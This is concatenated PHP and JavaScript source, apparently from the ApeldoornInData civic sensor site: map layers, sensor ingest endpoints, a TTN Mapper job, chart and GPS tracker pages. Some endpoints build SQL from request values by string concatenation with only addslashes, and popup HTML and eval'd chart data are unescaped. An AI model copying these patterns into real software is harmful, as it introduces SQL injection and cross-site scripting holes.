anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorHourStyleCache[size] = style;
}
return style;
}
});
// get all sensor data
var sensorAllDataSource = new ol.source.GeoJSON({
url: 'data/sensors_json.php?select=all',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992'
});
var sensorAllStyleCache = {};
var sensorAllDataLayer = new ol.layer.Vector({
visible: false,
title: 'sensoren alles',
source: new ol.source.Cluster({
distance: 40,
source: sensorAllDataSource,
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorAllStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorAllStyleCache[size] = style;
}
return style;
}
});
var url = 'https://geodata1.nationaalgeoregister.nl/luchtfoto/wmts/luchtfoto_png/nltilingschema/';
var tileUrlFunction = function(tileCoord, pixelRatio, projection) {
var zxy = tileCoord;
if (zxy[1] < 0 || zxy[2] < 0) return "";
return url +
zxy[0].toString()+'/'+ zxy[1].toString() +'/'+
((1 << zxy[0]) - zxy[2] - 1).toString() +'.png';
};
luchtfoto = new ol.layer.Tile({
title: 'Luchtfoto',
type: 'base',
visible: false,
source: new ol.source.TileImage({
attributions: [
new ol.Attribution({
html: 'Kaartgegevens: <a href="http://creativecommons.org/licenses/by-nc/3.0/nl/">CC-BY-NC</a> <a href="http://www.pdok.nl">PDOK</a>.'
})
],
projection: 'EPSG:28992',
tileGrid: new ol.tilegrid.TileGrid({
origin: [-285401.92,22598.08],
resolutions: resolutions
}),
tileUrlFunction: tileUrlFunction
}),
});
var topografie = new ol.layer.Tile({
title: 'Topografie',
type: 'base',
visible: true,
source: new ol.source.WMTS({
url: 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/brtachtergrondkaart',
layer: 'brtachtergrondkaart',
// url: 'http://geodata.nationaalgeoregister.nl/tiles/service/wmts/brtachtergrondkaartgrijs',
// layer: 'brtachtergrondkaartgrijs',
attributions: [
new ol.Attribution({
html: 'Kaartgegevens: <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.nl">CC-BY-SA</a> <a href="http://www.osm.org">OSM</a> & <a href="http://www.kadaster.nl">Kadaster</a>.'
})
],
matrixSet: 'EPSG:28992',
format: 'image/png',
tileGrid: new ol.tilegrid.WMTS({
origin: ol.extent.getTopLeft(projectionExtent),
resolutions: resolutions,
matrixIds: matrixIds
})
}),
});
var ahn = new ol.layer.Tile({
title: 'AHN',
type: 'base',
visible: false,
source: new ol.source.WMTS({
url: 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/ahn2',
layer: 'ahn2_05m_ruw',
// url: 'http://geodata.nationaalgeoregister.nl/tiles/service/wmts/ahn3',
// layer: 'ahn3_05m_dtm',
attributions: [
new ol.Attribution({
html: 'Kaartgegevens: <a href="http://creativecommons.org/publicdomain/zero/1.0/deed.nl">CC-0</a> <a href="www.ahn.nl">AHN</a>.'
})
],
matrixSet: 'EPSG:28992',
format: 'image/png',
tileGrid: new ol.tilegrid.WMTS({
origin: ol.extent.getTopLeft(projectionExtent),
resolutions: resolutions,
matrixIds: matrixIds
})
}),
});
// Create the map
var map = new ol.Map({
target: 'map', // The DOM element that will contains the map
renderer: 'canvas', // Force the renderer to be used
layers: [
new ol.layer.Group({
title: 'Achtergrond',
layers: [
luchtfoto,
// ahn,
topografie
]
}),
new ol.layer.Group({
title: 'Kaartlagen',
layers: [
sensorAllDataLayer,
sensorHourDataLayer
]
})
],
projection: 'EPSG:28992',
view: new ol.View({
// center: ol.extent.getCenter(projectionExtent),
center: ol.proj.transform([5.967979, 52.209711], 'EPSG:4326', 'EPSG:28992'),
zoom: 14
})
});
var layerSwitcher = new ol.control.LayerSwitcher({
tipLabel: 'Legenda'
});
map.addControl(layerSwitcher);
// -- Display information on singleclick --
// Create a popup overlay which will be used to display feature info
var popup = new ol.Overlay.Popup();
map.addOverlay(popup);
// Add an event handler for the map "singleclick" event
map.on('singleclick', function(evt) {
// Hide existing popup and reset it's offset
popup.hide();
popup.setOffset([0, 0]);
// Attempt to find a feature in one of the visible vector layers
// alert(evt.pixel);
var feature = map.forEachFeatureAtPixel(evt.pixel, function(feature, layer) {
// alert(layer);
// alert(feature);
return feature;
});
if (feature != null) {
feature = feature.get('features')[0];
if (feature) {
var coord = feature.getGeometry().getCoordinates();
var props = feature.getProperties();
var info;
if (feature != null) {
info = '<h2>' + feature.o[0].location + '</h2>';
info += '<i>' + feature.o[0].timestamp + '</i><br/>';
var arrayTags = $.map(feature.o, function (value, index) {
return [value];
});
for (index = 0; index < arrayTags.length; ++index) {
if (arrayTags[index].name != undefined && arrayTags[index].value != undefined) {
info += arrayTags[index].name + ': ' + arrayTags[index].value + '<br/>';
}
}
}
// Offset the popup so it points at the middle of the marker not the tip
popup.setOffset([10, -60]);
popup.show(coord, info);
}
}
});
}
var thisPage;
function showPage(url) {
if (url && thisPage!==url) {
thisPage = url;
document.getElementById('textframe').style.visibility = 'visible';
var request = window.XMLHttpRequest?new XMLHttpRequest():new ActiveXObject('Microsoft.XMLHTTP');
request.onreadystatechange = function() {
if(request.readyState == 4) {
document.getElementById('frame').style.display = 'block';
document.getElementById('textframe').innerHTML = request.responseText;
}
}
request.open('GET', url, true);
request.send(null);
}
else {
document.getElementById('frame').style.display = 'none';
thisPage = '';
}
var menuItems = document.getElementsByTagName('menu');
for(var i=0; i<menuItems.length; i++) if (menuItems[i].getAttribute('id')==thisPage) menuItems[i].setAttribute('class', 'menuSelected');
else menuItems[i].setAttribute('class', 'menuDefault');
}
function toggleMenu() {
menu = document.getElementById('menu');
if (menu.style.display == 'block') menu.style.display = 'none';
else menu.style.display = 'block';
}
<file_sep><?php
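/*
 * Simple ingest endpoint: stores a temperature (temp) and humidity (hu) reading
 * in measurement1 and measurement2 with the current timestamp.
 */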
include('db.php');
if(!isset($_REQUEST['temp']) || !is_numeric($_REQUEST['temp'])) {
die("Invalid temp parameter");
}
if(!isset($_REQUEST['hu']) || !is_numeric($_REQUEST['hu'])) {
die("Invalid hu parameter");
}
//var_dump($_REQUEST);
$sql = 'INSERT INTO measurement1 SET Moment=NOW(), Tagvalue='.$_REQUEST['temp'];
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement2 SET Moment=NOW(), Tagvalue='.$_REQUEST['hu'];
//echo $sql;
$result = mysqlquery($sql);
?><file_sep># ApeldoornInData
apeldoornindata.nl

Source code for apeldoornindata.nl: collecting, storing and visualising sensor data (LoRaWAN / NB-IoT nodes and TTN gateways) for Apeldoorn, with a MySQL schema, PHP data/export/chart pages and an OpenLayers map.
<file_sep><?php
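/*
 * TTN Mapper processing job: reads unprocessed rows from lorarawttnmapper,
 * extracts the GPS fix (lat/lon/alt), timestamp and strongest RSSI from the TTN
 * payload, stores them in lorarawttnmapperlocation, updates per-gateway
 * statistics in lorarawttnmappergateway and links gateways to locations.
 * The page reloads itself every 100 ms to keep draining the queue.
 */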
include('db.php');
?>
<script type="text/javascript">
setTimeout(function () { location.reload(true); }, 100);
</script>
<?php
//echo '<pre>';
/*
$sql = 'Truncate lorarawttnmapperlocation';
mysqlquery($sql);
$sql = 'Truncate lorarawttnmappergateway';
mysqlquery($sql);
*/
$sql = 'SELECT * FROM lorarawttnmapper WHERE Processed = 0 ORDER BY moment ASC LIMIT 50';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
echo $row['Id'].'<br/>';
//var_dump($row);
$insertIdLocation = null; // reset per record so gateway relations only link to a location stored for this record
if(isset($row['Data'])) {
$dataObject = json_decode($row['Data']);
if(isset($dataObject->payload_fields)) {
$availableFields = 0;
if(isset($dataObject->payload_fields->latitude)) {
$lat = $dataObject->payload_fields->latitude;
//echo 'Lat: '.$lat.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->payload_fields->longitude)) {
$lon = $dataObject->payload_fields->longitude;
//echo 'Lon: '.$lon.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->payload_fields->altitude)) {
$alt = $dataObject->payload_fields->altitude;
//echo 'Alt: '.$alt.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->payload_fields->hdop)) {
$hdop = $dataObject->payload_fields->hdop;
//echo 'Hdop: '.$hdop.'<br/>'."\n";
}
if(isset($dataObject->metadata->time)) {
$time = $dataObject->metadata->time;
//echo 'Time: '.$time.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->metadata->gateways)) {
$gateways = $dataObject->metadata->gateways;
usort($gateways, function($a, $b) { //Sort the array using a user defined function
return $a->rssi > $b->rssi ? -1 : 1; //Compare the scores
});
$rssi = $gateways[0]->rssi;
$availableFields++;
}
if($availableFields == 5) {
$sql = 'INSERT INTO lorarawttnmapperlocation SET Moment = \''.$time.'\', Lat = '.$lat.', Lon = '.$lon.', Alt = '.$alt.', Rssi = '.$rssi.', Rawid = '.$row['Id'];
//echo $sql.'<br/>';
mysqlquery($sql);
$insertIdLocation = mysqli_insert_id($GLOBALS['mysqli']);
//echo 'Insert Id: '.$insertIdLocation.'<br/>';
}
if(isset($dataObject->metadata->gateways)) {
$gateways = $dataObject->metadata->gateways;
//var_dump($gateways);
foreach ($gateways as $gateway) {
$sqlGw = 'INSERT INTO lorarawttnmappergateway SET Gwid = \''.$gateway->gtw_id.'\', Lastmessage = \''.$time.'\', Lat = '.$gateway->latitude.', Lon = '.$gateway->longitude.', Alt = '.$gateway->altitude.', Ch'.$gateway->channel.' = Ch'.$gateway->channel.' + 1 ON DUPLICATE KEY UPDATE Lastmessage = \''.$time.'\', Lat = '.$gateway->latitude.', Lon = '.$gateway->longitude.', Alt = '.$gateway->altitude.', Ch'.$gateway->channel.' = Ch'.$gateway->channel.' + 1';
//echo $sql.'<br/>';
mysqlquery($sqlGw);
if($insertIdLocation !== null) {
$sql1 = 'SELECT * FROM lorarawttnmappergateway WHERE Gwid = \''.$gateway->gtw_id.'\'';
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO lorarawttnmapperlocationgwrelation SET Gwid = \''.$row1['Id'].'\', Location = '.$insertIdLocation.'';
//echo $sql2.'<br/>';
mysqlquery($sql2);
}
}
}
}
}
}
$sql3 = 'UPDATE lorarawttnmapper SET Processed = 1 WHERE Id = '.$row['Id'];
//echo $sql3.'<br/>';
mysqlquery($sql3);
}
?><file_sep><?php
include('db.php');
if(!isset($_REQUEST['id'])) {
echo 'id niet ingegeven';
exit();
}
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$limit = '';
if(isset($_REQUEST['limit']) && is_numeric($_REQUEST['limit'])) {
$limit = $_REQUEST['limit'];
}
$daysback = 0;
if(isset($_REQUEST['daysback'])) {
if(is_numeric($_REQUEST['daysback'])) {
$daysback = addslashes($_REQUEST['daysback']);
}
}
$points = null;
$multipleAxis = false;
$sql = 'SELECT * FROM point WHERE Nodeid = '.addslashes($_REQUEST['id']).' ORDER BY Priority';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = $row['Name'];
if($row['Name'] == 'Lichtintensiteit'
|| $row['Name'] == 'Luchtdruk'
|| $row['Name'] == 'CO2' ) {
$multipleAxis = true;
}
}
?>
<html style="width: 100%; height: 100%; margin: 0;">
<head>
<!--Load the AJAX API-->
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
// Load the Visualization API and the piechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=<?php echo addslashes($_REQUEST['id']) ?>&type=fullnode&limit=<?php echo addslashes($limit).'&daysback='.$daysback; ?>",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 80, right: 50, top:10, bottom: 20},
legend: {position: 'none'},
interpolateNulls: true,
<?php
if(!$multipleAxis) {
echo 'vAxis: {format:\'#.#\'},'."\n";
} else {
echo 'vAxes: {0: {logScale: false}, 1: {logScale: false, minValue: 0}},'."\n";
$j=0;
echo 'series:{';
foreach($points as $point)
{
if($j != 0) {
echo ', ';
}
echo $j.':{targetAxisIndex:';
if($point == 'Lichtintensiteit'
|| $point == 'Luchtdruk'
|| $point == 'CO2' )
{
echo '1}';
} else {
echo '0}';
}
$j++;
}
echo '},';
}
?>
hAxis: {
format: 'HH:mm:ss',
}
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
<?php
foreach((array) $points as $point) {
echo 'data.addColumn(\'number\', \''.$point.'\');'."\n";
}
?>
data.insertRows(0, eval(jsonData));
var date_formatter = new google.visualization.DateFormat({
pattern: "dd/MM/yyyy HH:mm:ss"
});
date_formatter.format(data, 0);
chart.draw(data, options);
}
$(window).resize(function() {
if(this.resizeTO) clearTimeout(this.resizeTO);
this.resizeTO = setTimeout(function() {
$(this).trigger('resizeEnd');
}, 500);
});
//redraw graph when window resize is completed
$(window).on('resizeEnd', function() {
drawChart(data);
});
</script>
</head>
<body style="width: 100%; height: 100%; margin: 0;">
<!--Div that will hold the pie chart-->
<div id="chart_div" style="width: 90%; height: 90%;"></div>
</body>
</html><file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
?>
<html style="width: 100%; height: 100%; margin: 0;">
<head>
<!--Load the AJAX API-->
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
// Load the Visualization API and the piechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=<?php echo addslashes($_REQUEST['id']) ?>&type=firstpriority",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 40, top:10, bottom: 50, width: 220, height: 80},
vAxis: {format:'#.#'},
legend: {position: 'none'},
hAxis: {
format: 'HH:mm:ss',
},
height: 100
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
data.addColumn('number', 'Temperatuur');
data.insertRows(0, eval(jsonData));
chart.draw(data, options);
// Create our data table out of JSON data loaded from server.
//var data = new google.visualization.DataTable(jsonData);
// Instantiate and draw our chart, passing in some options.
//chart.draw(data, {width: 400, height: 240});
}
</script>
</head>
<body style="width: 100%; height: 100%; margin: 0;">
<!--Div that will hold the pie chart-->
<div id="chart_div"></div>
</body>
</html><file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<?php
include('headinclude.php');
?>
<meta http-equiv="refresh" content="60">
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
<link rel="stylesheet" href="https://unpkg.com/leaflet@1.1.0/dist/leaflet.css" integrity="<KEY> crossorigin=""/>
<script src="https://unpkg.com/leaflet@1.1.0/dist/leaflet.js" integrity="<KEY> crossorigin=""></script>
</head>
<body style="padding:0px">
<?php
include('db.php');
echo '<div class="container-fluid">'."\n";
echo '<div class="row">'."\n";
echo '<div class="col-sm-12">'."\n";
echo '<h1>GPS tracker '.addslashes($_REQUEST['id']).'</h1>'."\n";
$sql = 'SELECT *, UNIX_TIMESTAMP(Moment) as unixtime FROM gpslocation'.addslashes($_REQUEST['id']).' ORDER BY Moment DESC Limit 3';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$locations[] = $row;
//var_dump($row);
}
//var_dump($locations);
echo '<table border="1" style="text-align: right;">'."\n";
echo '<tr><th>Moment</th>';
echo '<th>Latitude</th>';
echo '<th>Longitude</th>';
echo '<th>Hdop</th>';
echo '<th>Speed</th>';
echo '<th>Alt</th>';
echo '<th>Direction</th>';
echo '<th>Connection</th>';
echo '</tr>'."\n";
$i = 1;
if(isset($locations)) {
foreach($locations as $location) {
if($i == 1) {
$lat = $location['Lat'];
$lon = $location['Lon'];
}
echo '<tr>';
if($location['unixtime'] > (time() - 60)) {
echo '<td>'.$location['Moment'].'</td>';
} else {
echo '<td bgcolor="red">'.$location['Moment'].'</td>';
}
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blank">'.$location['Lat'].'</a></td>';
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blank">'.$location['Lon'].'</a></td>';
echo '<td>';
printf("%.2f", $location['Hdop']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Speed']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Alt']);
echo '</td>';
echo '<td>';
printf("%.1f", str_replace('-', '', $location['Direction']));
echo '</td>';
echo '<td>';
$gateways = json_decode($location['Gateway']);
foreach ($gateways as $gateway) {
echo $gateway->gtw_id.' - '.$gateway->channel.' - '.$gateway->rssi.' - '.$gateway->snr ;
echo '<br/>';
}
//echo $location['Gateway'];
echo '</td>';
echo '</tr>'."\n";
$i++;
}
} else {
echo '<tr><td>Geen data</td></tr>'."\n";
}
echo '</table>'."\n";
if(isset($lat)) {
echo '<div class="col-sm-7"><img src="https://maps.googleapis.com/maps/api/staticmap?center='.$lat.','.$lon.'&zoom=15&size=400x400&markers=color:red%7Clabel:Locatie%7C'.$lat.','.$lon.'&key=<KEY>"/></div>'."\n";
}
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
<script type="text/javascript" src="https://www.ikbennuhier.nl/js/default.js"></script>
</body>
</html><file_sep><?php
function getTabsArrayHealtyHome($payloadraw) {
var_dump($payloadraw);
$payload = bin2hex(base64_decode($payloadraw));
var_dump($payload);
$arrPayload = hexToBytes($payload);
var_dump($arrPayload);
$returnArray = array();
for($i=0; $i < count($arrPayload); $i++) {
switch($i) {
case 1: // battery
$accuremaining = hexdec(substr($arrPayload[$i], 0, 1));
$returnArray['accuremaining'] = ($accuremaining / 15) * 100;
$accuvoltage = hexdec(substr($arrPayload[$i], 1, 1));
$returnArray['accuvoltage'] = ($accuvoltage + 25) /10;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 2: // Temperature
$temp = hexdec($arrPayload[$i]);
$returnArray['temperature'] = $temp - 32;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 3: // RH
$rh = hexdec($arrPayload[$i]);
$returnArray['humidity'] = $rh;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 4: // CO2
$co2 = hexdec($arrPayload[$i]) * 256 + hexdec($arrPayload[$i + 1]);
$returnArray['co2'] = $co2;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 6: // VOC
$voc = hexdec($arrPayload[$i]) * 256 + hexdec($arrPayload[$i + 1]);
$returnArray['voc'] = $voc;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
}
}
return $returnArray;
}
function getTabsArrayPir($payloadraw) {
var_dump($payloadraw);
$payload = bin2hex(base64_decode($payloadraw));
var_dump($payload);
$arrPayload = hexToBytes($payload);
var_dump($arrPayload);
$returnArray = array();
for($i=0; $i < count($arrPayload); $i++) {
switch($i) {
case 0: // status
$occupied = hexdec($arrPayload[$i]);
$returnArray['occupied'] = $occupied;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 1: // battery
$accuremaining = hexdec(substr($arrPayload[$i], 0, 1));
$returnArray['accuremaining'] = ($accuremaining / 15) * 100;
$accuvoltage = hexdec(substr($arrPayload[$i], 1, 1));
$returnArray['accuvoltage'] = ($accuvoltage + 25) /10;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 2: // Temperature
$temp = hexdec($arrPayload[$i]);
$returnArray['temperature'] = $temp - 32;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 3: // time
$time = hexdec($arrPayload[$i]) * 256 + hexdec($arrPayload[$i + 1]);
$returnArray['time'] = $time;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 5: // Total motion count
$motioncount = hexdec($arrPayload[$i]) * 256 * 256 + hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['motioncount'] = $motioncount;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
}
}
return $returnArray;
}
if(!function_exists('hexToBytes')){
function hexToBytes($hex) {
$bytes = array();
echo 'Payload length: '.strlen($hex).'<br/>';
for ($c = 0; $c < strlen($hex); $c += 2) {
array_push($bytes, substr($hex, $c, 2));
}
return $bytes;
}
}
?><file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$limit = 1000;
if(isset($_REQUEST['limit'])) {
if(is_numeric($_REQUEST['limit'])) {
if($_REQUEST['limit'] < 50000) {
$limit = addslashes($_REQUEST['limit']);
}
}
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
<link rel="stylesheet" href="https://unpkg.com/leaflet@1.1.0/dist/leaflet.css" integrity="<KEY> crossorigin=""/>
<script src="https://unpkg.com/leaflet@1.1.0/dist/leaflet.js" integrity="<KEY> crossorigin=""></script>
</head>
<body>
<?php
include('db.php');
include('menu.php');
echo '<div class="container-fluid">'."\n";
echo '<h1>Locations GPS tracker '.addslashes($_REQUEST['id']).'</h1>'."\n";
echo '<div class="row">'."\n";
echo '<div class="col-sm-5">'."\n";
$sql = 'SELECT * FROM gpslocation'.addslashes($_REQUEST['id']).' ORDER BY Moment DESC Limit '.$limit;
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$locations[] = $row;
//var_dump($row);
}
//var_dump($locations);
echo '<table border="1" style="text-align: right;">'."\n";
echo '<tr><th>Moment</th>';
echo '<th>Latitude</th>';
echo '<th>Longitude</th>';
echo '<th>Hdop</th>';
echo '<th>Speed</th>';
echo '<th>Alt</th>';
echo '<th>Direction</th>';
echo '<th>Connection</th>';
echo '</tr>'."\n";
if(isset($locations)) {
foreach($locations as $location) {
echo '<tr>';
echo '<td>'.$location['Moment'].'</td>';
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blank">'.$location['Lat'].'</a></td>';
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blank">'.$location['Lon'].'</a></td>';
echo '<td>';
printf("%.2f", $location['Hdop']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Speed']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Alt']);
echo '</td>';
echo '<td>';
printf("%.1f", str_replace('-', '', $location['Direction']));
echo '</td>';
echo '<td>';
$sql1 = 'SELECT * FROM gpsgateway LEFT JOIN gateway ON gpsgateway.Gwid = gateway.Gateway WHERE gpsgateway.Gpslocationid = '.$location['Id'];
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
echo 'GW: '.$row1['Gwid'].' ('.$row1['Name'].') - SNR: ';
printf("%.1f", str_replace('-', '', $row1['Snr']));
echo ' - RSSI: '.$row1['Rssi']."\n";
}
echo '</td>';
echo '</tr>'."\n";
}
} else {
echo '<tr><td>Geen data</td></tr>'."\n";
}
echo '</table>'."\n";
echo '</div>'."\n";
echo '<div class="col-sm-7"><div id="mapid" style="width: 1200px; height: 800px;"></div>'."\n";
echo '</div>'."\n";
echo '</div>'."\n";
if(isset($locations)) $locations = array_reverse($locations);
?>
<script>
var mymap = L.map('mapid').setView([<?php
if(isset($locations)) {
echo array_reverse($locations)[0]['Lat'].', '.array_reverse($locations)[0]['Lon'];
}
?>
], 13);
L.tileLayer('https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}.png?access_token=<KEY>', {
maxZoom: 18,
attribution: 'Map data © <a href="http://openstreetmap.org">OpenStreetMap</a> contributors, ' +
'<a href="http://creativecommons.org/licenses/by-sa/2.0/">CC-BY-SA</a>, ' +
'Imagery © <a href="http://mapbox.com">Mapbox</a>',
id: 'mapbox.streets'
}).addTo(mymap);
<?php
if(isset($locations)) {
foreach($locations as $location) {
echo 'L.marker(['.$location['Lat'].', '.$location['Lon'].']).addTo(mymap).bindPopup("<b>'.$location['Moment'].'</b><br />Snelheid: ';
printf("%.1f", $location['Speed']);
echo ' km/h<br/>Richting: ';
printf("%.1f", $location['Direction']);
echo '°<br/>Hdop: ';
printf("%.2f", $location['Hdop']);
echo '<br/>Hoogte: ';
printf("%.1f", $location['Alt']);
echo ' m").openPopup();'."\n";
}
}
?>
</script>
<?php
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
<script type="text/javascript" src="https://www.ikbennuhier.nl/js/default.js"></script>
</body>
</html><file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
if(!isset($_REQUEST['code'])) {
die("Invalid code parameter");
}
if(!is_numeric($_REQUEST['code'])) {
die("Invalid code parameter");
}
if(!isset($_REQUEST['location'])) {
die("Invalid Location parameter");
}
if(strpos($_REQUEST['location'], ',') === false) {
die("location parameter has no ,");
}
if(strlen($_REQUEST['location']) < 3) {
die("location parameter is to short");
}
function insertIntoInflux($nodeName, $insertData) {
//logerror('Insert into Influx: '.$nodeName.' '.$insertData);
$ch = curl_init('http://localhost:8086/write?db=aid');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $nodeName.' '.$insertData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
$nodeName = '';
$influxData = '';
$sendToLuftDaten = false;
$luftdatenSensorName = '';
$sendToRIVM = false;
logerror('Start SendData: '.$_REQUEST['id'].' - '.json_encode($_REQUEST));
$sql = 'SELECT * FROM node WHERE Id = '.addslashes($_REQUEST['id']).' AND Hwserial = '.addslashes($_REQUEST['code']);
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeName = strtolower(str_replace('-', '', preg_replace('/\s+/', '', $row['Name'])));
//echo $_REQUEST['location'].'<br/>';
$locationarr = explode(',', $_REQUEST['location']);
$lat = $locationarr[0];
$lon = $locationarr[1];
//echo 'Lat: '.$lat.'<br/>';
//echo 'Lon: '.$lon.'<br/>';
$dateNow = date('Y-m-d H:i:s');
if($row['Id'] == 19) {
$sql = 'UPDATE node SET Lastmessage=NOW(), Packets = Packets + 1, Lastlocationlat = \'52.18430\', Lastlocationlon = \'5.94394\' WHERE Id='.$row['Id'];
//echo $sql;
$result = mysqlquery($sql);
} elseif($row['Id'] == 75) {
$sql = 'UPDATE node SET Lastmessage=NOW(), Packets = Packets + 1, Lastlocationlat = \'52.03057\', Lastlocationlon = \'5.57186\' WHERE Id='.$row['Id'];
//echo $sql;
$result = mysqlquery($sql);
} else {
$sql = 'UPDATE node SET Lastmessage=NOW(), Packets = Packets + 1';
if($lat != 0 && $lon != 0) {
$sql .= ', Lastlocationlat = '.addslashes($lat).', Lastlocationlon = '.addslashes($lon);
}
$sql .= ' WHERE Id='.$row['Id'];
//echo $sql;
$result = mysqlquery($sql);
}
if(array_key_exists('pm10', $_REQUEST)) {
echo 'PM10 '.htmlspecialchars(addslashes($_REQUEST['pm10'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Fijnstof - PM10\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['pm10']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
$pm10 = $_REQUEST['pm10'];
}
if($influxData != '') $influxData .= ',';
$influxData .= 'pm10='.floatval($_REQUEST['pm10']);
}
if(array_key_exists('pm25', $_REQUEST)) {
echo 'PM2.5 '.htmlspecialchars(addslashes($_REQUEST['pm25'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Fijnstof - PM2.5\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['pm25']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
$pm25 = $_REQUEST['pm25'];
}
if($influxData != '') $influxData .= ',';
$influxData .= 'pm25='.floatval($_REQUEST['pm25']);
}
if(array_key_exists('co2', $_REQUEST)) {
echo 'CO2 '.htmlspecialchars(addslashes($_REQUEST['co2'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'CO2\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
